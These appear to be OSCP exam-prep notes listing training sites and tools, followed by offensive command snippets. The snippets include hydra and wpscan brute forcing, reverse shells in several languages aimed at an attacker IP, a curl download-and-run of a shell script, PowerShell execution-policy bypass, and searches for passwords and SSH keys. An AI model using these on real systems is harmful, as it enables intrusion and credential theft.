official exam guide
official exam report
pentest.ws: note taking
Burp Suite: tool for exploring web security. Configure browser with Burp Suite
OWASP Juice Shop: OWASP security training
[hack this site]
[over the wire]
[pwnable.kr/xyz]
[hack the box]
[cybrary]
[Google Gruyere]
[game of hacks]
[bWAPP]
[Webgoat]
hashcat: password recovery tool rule_based_attack
feroxbuster: powerful forced browsing tool (gobuster, dirb)
AutoRecon: multi-threaded network reconnaissance tool which performs automated enumeration of services
explainshell: explain command-line
SecLists: a collection of multiple types of lists used during security assessments, collected in one place
Reverse Shell Generator: online reverse shell generator
hacktricks
CyberChef: a web app for encryption, encoding, compression and data analysis.
Microsoft Security Response Center
exploit-notes.hdks.org
cvexploits.io: CVExploits Search
portswigger.net/web-security: Learn various web security techniques.
offsec.tools: A vast collection of security tools for bug bounty, pentest and red teaming.
LOLBAS: Living Off The Land Binaries, Scripts and Libraries
CAPEC: Common Attack Pattern Enumerations and Classifications
Burp Suite: Burp Suite Certified Practitioner Exam Study
BloodyAD: An Active Directory Privilege Escalation Framework
NetExec: The Network Execution Tool (CrackMapExec)
MITRE ATT&CK: ATT&CK Matrix for Enterprise
jadx: Dex to Java decompiler
nuclei: Community Powered Vulnerability Scanner, nuclei templates
Tilix: Tilix is a terminal emulator for Linux systems. It provides features such as support for split terminals, custom layouts, and a Quake-style drop-down mode.
API Penetration Testing: Mindmaps, tips & tricks, resources
Assetnote Wordlists
HackingHub: a platform offering guidance on improving hacking skills in real-world scenarios.
linPEAS: Understanding the tools/scripts you use in a Pentest
Official Exam Guide
2022 Official OSCP Prep Guide
2022/1/11 Active Directory
2022/8/6 OSCP Bonus Points Update
2023/3/15 PEN-200 (PWK): Updated for 2023
- FAQ
- The OSCP exam is not changing as part of the update, with the exception of the removal of the independent Buffer Overflow machine from the exam. After the new material has been available for six months, any content included in the new version of PWK will be eligible for inclusion on the exam.
Make sure there is no limit on the number of login attempts (account lockout); check this manually first.
IMAP
hydra -L <usernameList> -P <passwordList> -s 143 -f <target ip> imap
# -f exit when a login/pass pair is found
# -s target port
PostgreSQL
hydra -l <username> -P <passwordList> <target ip> postgres
for a normal connection
psql -U <username> -p 5432 -h <hostname or ip>
HTTP Basic Authentication
hydra -l admin -P <passwordList> -s 80 -f <target ip> http-get /
# / is the default path
JSON
# headers that may be required: Content-Type, Accept, Origin, X-Requested-With, Referer and CSRF checks, Cookies
# use cURL to find out which headers are necessary
hydra -l admin -P <passwordList> <target ip> https-post-form "/login:{\"username\"\:\"^USER^\",\"password\"\:\"^PASS^\"}:F=401:H=Origin\: https\://test.com:H=Accept\: application/json, text/plain, */*:H=Content-Type\: application/json;charset=utf-8"
generate a wordlist for password crackers from a website
cewl -d 4 https://192.168.0.1 -w /tmp/wordlists.txt --with-numbers --lowercase
# -d depth
# --with-numbers: Accept words with numbers in as well as just letters
# --help
scan a subnet
# Note: a timing template that is too fast may affect the results
nmap -T3 192.168.10.0/24
scan all TCP ports and services
nmap -Pn -p- -sC -sV -T4 <target ip>
optimizing performance
nmap -p- --min-rate 1000 <target ip>
# --min-rate <number>: Send packets no slower than <number> per second
# then scan the specific ports found in more detail
nmap -p <target port> -sC -sV <target ip>
# UDP
nmap -p- --min-rate 1000 -sU <target ip>
ncat
ncat -e /bin/bash <attacker ip> <attacker port>
python3 (file)
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<attacker ip>",<attacker port>))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
python (file)
#!/usr/bin/env python
import os
import sys
try:
    os.system("python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker ip>\",<attacker port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")\'")
except:
    print 'ERROR...'
    sys.exit(0)
When passing the command as a parameter to an exploit file fails, embed it as a string in the exploit instead
python
command = "echo '/bin/bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && /bin/bash /tmp/revshell.sh"
java
String[] cmdline = { "sh", "-c", "echo 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1' > /tmp/revshell.sh && chmod 777 /tmp/revshell.sh && bash /tmp/revshell.sh" };
Runtime.getRuntime().exec(cmdline);
php (file)
<?php system("nc -e /bin/bash <attacker ip> <attacker port>"); ?>
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1'");?>
special case 1
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> <attacker port> >/tmp/f
special case 2: host the script on the attacker machine, then download and run it
# rev.sh contains:
# sh -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1
curl http://<attacker ip>/rev.sh -o /tmp/rev.sh
bash /tmp/rev.sh
base64
echo 'bash -c "bash -i >& /dev/tcp/<attacker ip>/<attacker port> 0>&1"' | base64
echo -n <base64 command string> | base64 -d | bash
# echo -n cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEyNy4wLjAuMSIsODApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJw== | base64 -d | bash
Windows cmd
REM https://www.revshells.com/ Powershell#3(Base64)
PowerShell.exe -command "powershell -e <base64 command string>"
crontab -l
ls -alh /etc/cron.* /etc/at*
cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/root 2>/dev/null | grep -v "^#"
unprivileged Linux process snooping: pspy
Finding the application
wpscan --url http://192.168.0.1/ --random-user-agent
Enumerating valid usernames
wpscan --url http://192.168.0.1/ --enumerate u1-1000 --random-user-agent
Enumerating themes
wpscan --url http://192.168.0.1/ -e at --random-user-agent
curl -k -s http://192.168.0.1/wp-content/themes/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Enumerating plugins
wpscan --url http://192.168.0.1/ -e ap --random-user-agent
wpscan --url http://192.168.0.1/ -e ap --plugins-detection aggressive --api-token <api_key> -t 20 --verbose --random-user-agent
# --api-token: display vulnerability data (not always necessary); register a user and get the API key from the official wpscan website
curl -k -s http://192.168.0.1/wp-content/plugins/ | html2text
curl -s -X GET http://192.168.0.1 | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Brute-force attack
wpscan --url http://192.168.0.1/ --passwords /usr/share/wordlists/rockyou.txt --max-threads 50 --usernames admin --random-user-agent
when the error "SSL peer certificate or SSH remote key was not valid" appears
wpscan --url https://192.168.0.1/ --disable-tls-checks --random-user-agent
LFI
useful file path on Windows
C:\Windows\System32\drivers\etc\hosts
git clone https://github.com/Tib3rius/AutoRecon.git
cd AutoRecon
sudo python3 autorecon.py <target IP> --dirbuster.wordlist "" # skip directory busting to speed up results
find subdomains
wfuzz -H 'Host: FUZZ.test.com' -u http://test.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 407
# --hw: hide responses with this number of words
when authentication is needed
# php example
wfuzz -H 'Cookie: PHPSESSID=<fill in the PHPSESSID>' -u https://<target ip>/<folder>/?FUZZ= -w <wordlist> --hw <value>
post requests
wfuzz -z file,<wordlist> -d "username=admin&password=FUZZ" --hc 302 <url>
# -d: POST data
# -z file,wordlist: payload source
# --hc: hide responses with this status code
create a new password list from an existing password using hashcat rules
echo -n "passwordstring" > /tmp/oldPass
# -n: do not output the trailing newline
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout /tmp/oldPass > /tmp/newPassList.txt
MD5
REM try -m 0 (MD5 hash mode)
.\hashcat.exe -a 0 -m 0 .\hash .\rockyou.txt
Typical site folders
/srv/http/
/var/www/html/
avoid permission denied messages
find / -name "*kali*" 2>&-
find / -writable -type f 2>/dev/null | grep -v "/proc/"
find files containing specific text
find / -type f \( -iname \*.php -o -iname \*.config -o -iname \*.conf -o -iname \*.ini -o -iname \*.txt \) -exec grep -i 'password\|passwd' {} \; -print 2>&-
grep -arin -o -E '(\w+\W+){0,5}password(\W+\w+){0,5}' .
# -a: Treat binary files as text files.
# -r: Recursively search subdirectories.
# -i: Perform a case-insensitive search.
# -n: Display line numbers along with the matched lines.
# -o: Only display the part of the line that matches the pattern.
# -E: Interpret the pattern as an extended regular expression.
# '(\w+\W+){0,5}password(\W+\w+){0,5}'
# (\w+\W+){0,5}: matches zero to five occurrences of a run of word characters followed by a run of non-word characters (roughly, up to five words) before the word "password".
# (\W+\w+){0,5}: matches zero to five occurrences of a run of non-word characters followed by a run of word characters (up to five words) after the word "password".
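The same context-window search as the grep command above, written in Python as an added example (not part of the original notes). The sample files are constructed inline; it mirrors -a (binary files searched as text), -i, -n and -o, and also generalises to walking a directory tree.

```python
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Same pattern as the grep command: up to five words of context on either
# side of "password"; re.IGNORECASE mirrors grep -i.
PASSWORD_CONTEXT = re.compile(r"(\w+\W+){0,5}password(\W+\w+){0,5}", re.IGNORECASE)

# Constructed sample corpus (not from any real system): filename -> raw bytes.
# blob.bin contains NUL bytes to show that binary files are still searched.
SAMPLE_FILES: Dict[str, bytes] = {
    "config.ini": b"[db]\nuser=app\npassword = hunter2\nhost=localhost\n",
    "notes.txt": b"Remember to rotate the admin PASSWORD before the audit next week.\n",
    "blob.bin": b"\x00\x01hdr\x00password=s3cret\x00\x00",
    "clean.txt": b"nothing sensitive here\n",
}

Hit = Tuple[str, int, str]  # (file name, line number, matched context)


def scan_bytes(name: str, data: bytes) -> List[Hit]:
    """Search one file's content; like grep -arin -o, report only the match."""
    hits: List[Hit] = []
    # errors="replace" lets binary content be searched as text (grep -a).
    text = data.decode("utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in PASSWORD_CONTEXT.finditer(line):
            hits.append((name, lineno, m.group(0)))
    return hits


def scan_files(files: Dict[str, bytes]) -> List[Hit]:
    """Scan an in-memory corpus; used for the embedded sample."""
    hits: List[Hit] = []
    for name, data in files.items():
        hits.extend(scan_bytes(name, data))
    return hits


def scan_directory(root: str) -> List[Hit]:
    """Recursive equivalent of grep -r over a real directory tree."""
    hits: List[Hit] = []
    for path in Path(root).rglob("*"):
        if path.is_file():
            hits.extend(scan_bytes(str(path), path.read_bytes()))
    return hits


if __name__ == "__main__":
    for name, lineno, ctx in scan_files(SAMPLE_FILES):
        print(f"{name}:{lineno}:{ctx!r}")
```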
finding SUID executables
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find ssh key
find / -type f -name "id_rsa*" 2>&-
group capabilities
id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),122(bluetooth),134(scanner),143(kaboxer)
find / -group <name> 2>/dev/null
# find / -group wireshark 2>/dev/null
locate files and run a command on each of them
find / -name "*.log" 2>/dev/null -exec cat {} \;
upgrade reverse shell in Kali
# 1. switch to bash and start the listener
bash
nc -nlvp <local port>
# 2
/usr/bin/script -qc /bin/bash /dev/null
# 3
script -c "/bin/bash -i" /dev/null
# chsh - change your login shell (-s sets the shell)
chsh -s /bin/bash
# full pathnames of valid login shells
cat /etc/shells
# 1. finding the current shell
echo $0
# 2. finding the current shell
/proc/self/exe --version
icacls: with /t, performs the operation on all specified files in the current directory and its subdirectories.
icacls <directory> /t
Remarks
A sequence of simple rights:
F - Full access
M - Modify access
RX - Read and execute access
R - Read-only access
W - Write-only access
download file
certutil -f -urlcache <URL> <local filename>
powershell -Command "Invoke-WebRequest '<URL>' -OutFile <filename>"
powershell -Command "Invoke-WebRequest \"<URL>\" -OutFile <filename>"
get file hash
certutil -hashfile <file> MD5
find files containing specific text
findstr /si password C:\*.xml C:\*.ini C:\*.txt C:\*.config C:\*.conf
bypass the execution policy
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\Windows\Temp\xxx.ps1
zip
Compress-Archive -Path C:\Users\guest\Desktop\dist -DestinationPath C:\Users\guest\Desktop\dist.zip
unzip
Expand-Archive -LiteralPath C:\Users\guest\Desktop\dist.zip -DestinationPath C:\Users\guest\Desktop
reverse shell
powershell -c "IEX(New-Object System.Net.WebClient).DownloadFile('http://192.168.0.100/nc.exe', 'C:\users\XXX\desktop\nc.exe');C:\users\XXX\desktop\nc.exe 192.168.0.100 80 -e cmd"
find specific files
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Filter "*.txt"
Get-ChildItem -Path "C:\Folder" -Recurse -Force -Include "*.txt","*.zip","*.conf"
disable the address-bar search function in Firefox (makes testing easier)
type "about:config" in the address bar
Accept warning
Search "keyword.enabled" and change it to false
header-modifying extension (or Burp Suite)
https://addons.mozilla.org/en-US/firefox/addon/simple-modify-header/
C:\Windows\SysWOW64
C:\Windows\System32
C:\Windows\System32\drivers\etc\hosts